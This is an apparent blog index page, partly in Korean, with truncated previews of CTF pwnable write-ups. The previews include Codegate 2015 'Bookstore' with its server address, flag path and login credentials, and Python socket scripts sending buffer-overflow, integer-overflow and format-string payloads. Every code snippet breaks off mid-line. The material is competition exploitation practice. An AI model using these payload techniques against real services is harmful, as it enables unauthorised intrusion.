123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869from err0rless import *import struct def getPassword(): s, t = connectSocket("192.168.95.148", 8777) print t.read_until("Password : ") t.write("A" * 0x11D + struct.pack("
Codegate 2015 Bookstore
Category: Pwnable Points: 400 Solves: TODO Description:Binary : http://binary.grayhash.com/7692931e710c1d805224c44ab97ddd52/bookstoreServer : 54.65.201.110Port : TCP 31337Flag Path : /home/bookstore/key Canary, NX, ASLR, PIE가 걸려있다. ROP를 하기엔 무리가 있는 난이도이다. 기본적인 동작과정은 메뉴들을 보면 대충 유추가 가능하다.Bookstore라는 이름과 같이 책정보를 기록하고 관리하는 프로그램이다. 로그인 아이디와 패스워드는 각각 helloadmin / iulover!@#$이다. 여기서 책을 구조체로 정의해 두어서 관리를 ..
12345678910111213141516171819202122232425262728from socket import *from telnetlib import *from struct import pack SERVER = ("prob.layer7.kr", 61616)s = socket(AF_INET, SOCK_STREAM)s.connect(SERVER)t = Telnet()t.sock = s print t.read_until("Password : ")s.send("0z57cr40a2abc34103295de63bb2b36e\n") # send password print t.read_until("people : ")s.send(str(0xFFFF + 1) + "\n") # Short Type integer o..
1234567891011121314151617181920212223from socket import *from telnetlib import *import struct SERVER = ("challs.campctf.ccc.ac", 10118) s = socket(AF_INET, SOCK_STREAM)s.connect(SERVER)t = Telnet()t.sock = s print t.read_until("name?") fmt = struct.pack("